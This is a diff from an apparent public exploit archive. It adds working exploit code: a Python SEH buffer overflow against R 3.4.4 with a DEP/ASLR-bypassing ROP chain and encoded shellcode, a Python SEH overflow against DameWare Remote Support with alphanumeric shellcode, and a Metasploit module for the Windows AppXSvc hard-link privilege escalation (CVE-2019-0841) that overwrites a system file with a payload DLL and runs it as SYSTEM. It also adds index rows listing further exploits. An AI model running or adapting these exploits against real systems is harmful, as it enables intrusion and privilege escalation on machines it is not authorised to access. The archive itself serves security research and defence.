+# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow  SEH(DEP/ASLR Bypass)
+# Date: 2019-07-15
+# Exploit Author: blackleitus
+# Vendor Homepage: https://www.r-project.org/
+# Tested on: Windows 10 Home Single Language 64-bit
+# Social: https://twitter.com/blackleitus
+# Website: https://skybulk.github.io/
+# discovered by: bzyo
+
+
+# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
+import struct 
+
+outfile = 'payload.txt'
+
+def create_rop_chain():
+    rop_gadgets = [
+       0x6c998f58,   # POP EAX # RETN [R.dll] 
+       0x6379973c,   # ptr to &VirtualProtect() [IAT methods.dll]
+       0x6fee2984,   # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll] 
+       0x6ca1ba76,   # XCHG EAX,ESI # RETN [R.dll] 
+       0x64c45cb8,   # POP ECX # RETN    ** [methods.dll] **   |   {PAGE_EXECUTE_READ}
+       0x64c46010,   # &Writable location [methods.dll]
+       0x6cacc7e2,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0xffffffc0,   # Value to negate, will become 0x00000040
+       0x7139c7ba,   # NEG EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
+       0x6ca3485a,   # XCHG EAX,EDX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x7135a862,   # POP EAX # RETN    ** [stats.dll] **   |   {PAGE_EXECUTE_READ}
+       0xfffffdff,   # Value to negate, will become 0x00000201
+       0x6e7d41ca,   # NEG EAX # RETN    ** [utils.dll] **   |   {PAGE_EXECUTE_READ}
+       0x63742597,   # XCHG EAX,EBX # RETN    ** [Rgraphapp.dll] **   |   {PAGE_EXECUTE_READ}
+       0x6cbef3c0,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x41414141,   # Filler (compensate)
+       0x6c9b1de7,   # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x6ca2a9bd,   # & jmp esp [R.dll]
+       0x6cbebfa6,   # POP EAX # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+       0x90909090,   # nop
+       0x6ca00e93,   # POP EDI # RETN [R.dll] 
+       0x6375fe5c,   # RETN (ROP NOP) [Rgraphapp.dll]
+       0x6ff1b7bb,   # PUSHAD # RETN [grDevices.dll]
+    ]
+
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+
+junk = "A" * 1016
+
+seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} :  # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [R.dll] **   |   {PAGE_EXECUTE_READ}
+
+# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python
+
+nops = struct.pack("<L", 0x6cacc7e3) * 30
+
+shellcode =  ""
+shellcode += "\x90" * 20
+shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
+shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
+shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
+shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
+shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
+shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
+shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
+shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
+shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
+shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
+shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
+shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
+shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
+shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
+shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
+shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
+shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"
+
+padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))
+
+payload = junk + seh + nops + rop_chain + shellcode + padding
+
+with open(outfile, 'w') as file:
+  file.write(payload)
+print "payload File Created\n"

exploits/windows/local/47126.py

@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+# Author: Xavi Beltran
+# Date: 11/07/2019
+# Description:
+#           SEH based Buffer Overflow
+#			DameWare Remote Support V. 12.0.0.509
+#			CVE-2018-12897
+
+# Contact: xavibeltran@protonmail.com
+# Webpage: https://xavibel.com
+# Tested on: Windows XP SP3 ESP
+
+# Credit for Adam Jeffreys from Nettitude! :)
+
+# Usage:
+#			Right click on a host >> AMT >> AMT Settings dialog
+#			Mark "Use SOCKS proxy" box
+#			Paste the string in the Host field
+
+junk  = "\x41" * 1672
+
+# Unicode compatible padding
+nseh = "\x61\x43"
+
+# 007A007B - POP POP RET
+seh = "\x7B\x7A"
+
+align  = ""
+align += "\x05\x20\x11"       # add eax,0x11002000
+align += "\x71"               # Venetian Padding
+align += "\x2d\x19\x11"       # sub eax,0x11001900
+align += "\x71"               # Venetian Padding
+align += "\x50"               # push eax
+align += "\x71"               # Venetian Padding
+align += "\xC3"               # RETN
+
+padding = "\x41" * 11
+
+junk2 = "\x41" * 870
+junk3 = "\x41" * 2014
+
+# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
+# ./alpha2 eax --unicode --uppercase < shellcode.raw
+# 508 bytes
+shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"
+
+
+crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3
+
+print(crash)

exploits/windows/local/47128.rb

@@ -0,0 +1,128 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Exploit::EXE
+  include Post::File
+  include Post::Windows::Priv
+  include Post::Windows::FileInfo
+  include Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AppXSvc Hard Link Privilege Escalation',
+      'Description'    => %q(
+        There exists a privilege escalation vulnerability for
+        Windows 10 builds prior to build 17763. Due to the AppXSvc's
+        improper handling of hard links, a user can gain full
+        privileges over a SYSTEM-owned file. The user can then utilize
+        the new file to execute code as SYSTEM.
+
+        This module employs a technique using the Diagnostics Hub Standard
+        Collector Service (DiagHub) which was discovered by James Forshaw to
+        load and execute a DLL as SYSTEM.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nabeel Ahmed',      # Vulnerability discovery and PoC
+        'James Forshaw',     # Code creating hard links and communicating with DiagHub service
+        'Shelby Pace'        # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-0841' ],
+          [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
+          [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'Windows 10', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => '2019-04-09',
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def check
+    return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
+
+    path = expand_path('%WINDIR%\\system32\\win32k.sys')
+    major, minor, build, revision, brand = file_version(path)
+    return CheckCode::Appears if build < 17763
+
+    CheckCode::Detected
+  end
+
+  def upload_file(file_name, file_path)
+    contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', file_name))
+    write_file(file_path, contents)
+    register_file_for_cleanup(file_path)
+  rescue
+    fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
+  end
+
+  def init_process
+    print_status("Attempting to launch Microsoft Edge minimized.")
+    cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
+  end
+
+  def mk_hard_link(src, target, link_exe)
+    out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
+
+    return (out && out.include?('Done'))
+  end
+
+  def write_payload
+    print_status('Writing the payload to disk')
+    code = generate_payload_dll
+    @original_data = read_file(@rtf_path)
+    write_file(@rtf_path, code)
+  end
+
+  def exploit
+    vuln_status = check
+    fail_with(Failure::NotVulnerable, 'Failed to detect Windows 10') if vuln_status == CheckCode::Unknown
+
+    fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
+    cmd_exec("taskkill /F /IM MicrosoftEdge.exe /FI \"STATUS eq RUNNING\"")
+    dat_path = expand_path("%USERPROFILE%\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Settings\\Settings.dat")
+    fail_with(Failure::NotFound, 'Path does not exist') unless exist?(dat_path)
+
+    if session.arch == ARCH_X86
+      exe_name = 'CVE-2019-0841_x86.exe'
+      f_name = 'diaghub_load_x86.exe'
+    elsif session.arch == ARCH_X64
+      exe_name = 'CVE-2019-0841_x64.exe'
+      f_name = 'diaghub_load_x64.exe'
+    end
+    link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
+    upload_file(exe_name, link_file_name)
+
+    @rtf_path = expand_path('%WINDIR%\\system32\\license.rtf')
+    fail_with(Failure::UnexpectedReply, 'Did not retrieve expected output') unless mk_hard_link(dat_path, @rtf_path, link_file_name)
+    print_good('Successfully created hard link')
+    init_process
+    cmd_exec("taskkill /F /IM MicrosoftEdge.exe")
+
+    write_payload
+    diaghub_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(8..12)}")
+    upload_file(f_name, diaghub_path)
+    cmd = "\"#{diaghub_path}\" \"license.rtf\""
+    cmd_exec(cmd)
+  end
+
+  def cleanup
+    folder_path = expand_path("%TEMP%\\etw")
+    dir_rm(folder_path)
+
+    write_file(@rtf_path, @original_data)
+    super
+  end
+end

files_exploits.csv

@@ -6509,6 +6509,7 @@ id,file,description,date,author,type,platform,port
 47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows,
 47119,exploits/android/dos/47119.txt,"Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write",2019-07-15,"Marcin Kozlowski",dos,android,
 47120,exploits/windows/dos/47120.rb,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)",2019-07-15,"RAMELLA Sebastien",dos,windows,3389
+47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10592,6 +10593,9 @@ id,file,description,date,author,type,platform,port
 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
 47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
+47122,exploits/windows/local/47122.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)",2019-07-16,blackleitus,local,windows,
+47126,exploits/windows/local/47126.py,"DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)",2019-07-16,"Xavi Beltran",local,windows,
+47128,exploits/windows/local/47128.rb,"Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)",2019-07-16,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17550,6 +17554,7 @@ id,file,description,date,author,type,platform,port
 47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
 47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
 47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
+47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41499,3 +41504,6 @@ id,file,description,date,author,type,platform,port
 47117,exploits/hardware/webapps/47117.txt,"NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass",2019-07-15,Wadeek,webapps,hardware,
 47118,exploits/hardware/webapps/47118.txt,"CISCO Small Business 200 / 300 / 500 Switches - Multiple Vulnerabilities",2019-07-15,Ramikan,webapps,hardware,
 47121,exploits/php/webapps/47121.txt,"FlightPath < 4.8.2 / < 5.0-rc2 - Local File Inclusion",2019-07-15,"Mohammed Althibyani",webapps,php,80
+47123,exploits/linux/webapps/47123.txt,"CentOS Control Web Panel 0.9.8.836 - Authentication Bypass",2019-07-16,"Pongtorn Angsuchotmetee",webapps,linux,
+47124,exploits/linux/webapps/47124.txt,"CentOS Control Web Panel 0.9.8.836 - Privilege Escalation",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,
+47125,exploits/linux/webapps/47125.txt,"CentOS Control Web Panel 0.9.8.838 - User Enumeration",2019-07-16,"Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak",webapps,linux,